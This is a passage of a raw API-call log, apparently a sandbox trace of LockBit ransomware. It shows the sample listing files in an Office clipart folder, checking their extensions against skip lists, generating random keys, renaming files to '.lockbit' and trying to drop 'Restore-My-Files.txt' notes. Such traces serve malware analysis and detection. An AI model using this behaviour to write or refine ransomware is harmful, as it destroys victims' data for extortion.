ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d24, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297269.WMF", cAlternateFileName="")) returned 1 [0156.977] lstrcmpiW (lpString1=".", lpString2="J0297269.WMF") returned -1 [0156.977] lstrcmpiW (lpString1="..", lpString2="J0297269.WMF") returned -1 [0156.977] PathFindExtensionW (pszPath="J0297269.WMF") returned=".WMF" [0156.977] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.978] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.979] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.979] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297269.WMF") returned 1 [0156.979] lstrcmpiW (lpString1="ntldr", lpString2="J0297269.WMF") returned 1 [0156.979] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297269.WMF") returned 1 [0156.979] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297269.WMF") returned -1 [0156.979] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297269.WMF") returned -1 [0156.979] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297269.WMF") returned 1 [0156.980] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297269.WMF") returned -1 [0156.980] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.980] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF") returned=".WMF" [0156.980] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.980] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.980] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.981] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.981] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.981] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.981] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.981] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.981] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF.lockbit") returned 72 [0156.981] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297269.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.982] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.982] malloc (_Size=0x40068) returned 0x3df0008 [0156.982] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15652) returned 1 [0156.982] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.983] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.983] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.988] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.988] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.988] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0156.990] free (_Block=0x1fa2ed8) [0156.990] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.990] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.990] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.990] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4236, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297725.WMF", cAlternateFileName="")) returned 1 [0156.990] lstrcmpiW (lpString1=".", lpString2="J0297725.WMF") returned -1 [0156.990] lstrcmpiW (lpString1="..", lpString2="J0297725.WMF") returned -1 [0156.990] PathFindExtensionW (pszPath="J0297725.WMF") returned=".WMF" [0156.990] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.990] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.991] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.991] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297725.WMF") returned 1 [0156.992] lstrcmpiW (lpString1="ntldr", lpString2="J0297725.WMF") returned 1 [0156.992] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297725.WMF") returned 1 [0156.992] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297725.WMF") returned -1 [0156.992] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297725.WMF") returned -1 [0156.992] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297725.WMF") returned 1 [0156.992] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297725.WMF") returned -1 [0156.992] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.992] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF") returned=".WMF" [0156.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.992] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.992] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.993] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.993] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF.lockbit") returned 72 [0156.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297725.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.995] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.995] malloc (_Size=0x40068) returned 0x3df0008 [0156.996] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16950) returned 1 [0156.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.996] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.997] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.002] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.002] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.002] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.003] free (_Block=0x1fa2ed8) [0157.003] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.003] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.004] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3c9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0297727.WMF", cAlternateFileName="")) returned 1 [0157.004] lstrcmpiW (lpString1=".", lpString2="J0297727.WMF") returned -1 [0157.004] lstrcmpiW (lpString1="..", lpString2="J0297727.WMF") returned -1 [0157.004] PathFindExtensionW (pszPath="J0297727.WMF") returned=".WMF" [0157.004] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.004] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.005] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.005] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0297727.WMF") returned 1 [0157.006] lstrcmpiW (lpString1="ntldr", lpString2="J0297727.WMF") returned 1 [0157.006] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0297727.WMF") returned 1 [0157.006] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0297727.WMF") returned -1 [0157.006] lstrcmpiW (lpString1="autorun.inf", lpString2="J0297727.WMF") returned -1 [0157.006] lstrcmpiW (lpString1="thumbs.db", lpString2="J0297727.WMF") returned 1 [0157.006] lstrcmpiW (lpString1="iconcache.db", lpString2="J0297727.WMF") returned -1 [0157.006] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.006] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF") returned=".WMF" [0157.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.007] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.007] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.008] lstrcmpiW (lpString1=".sqlite", 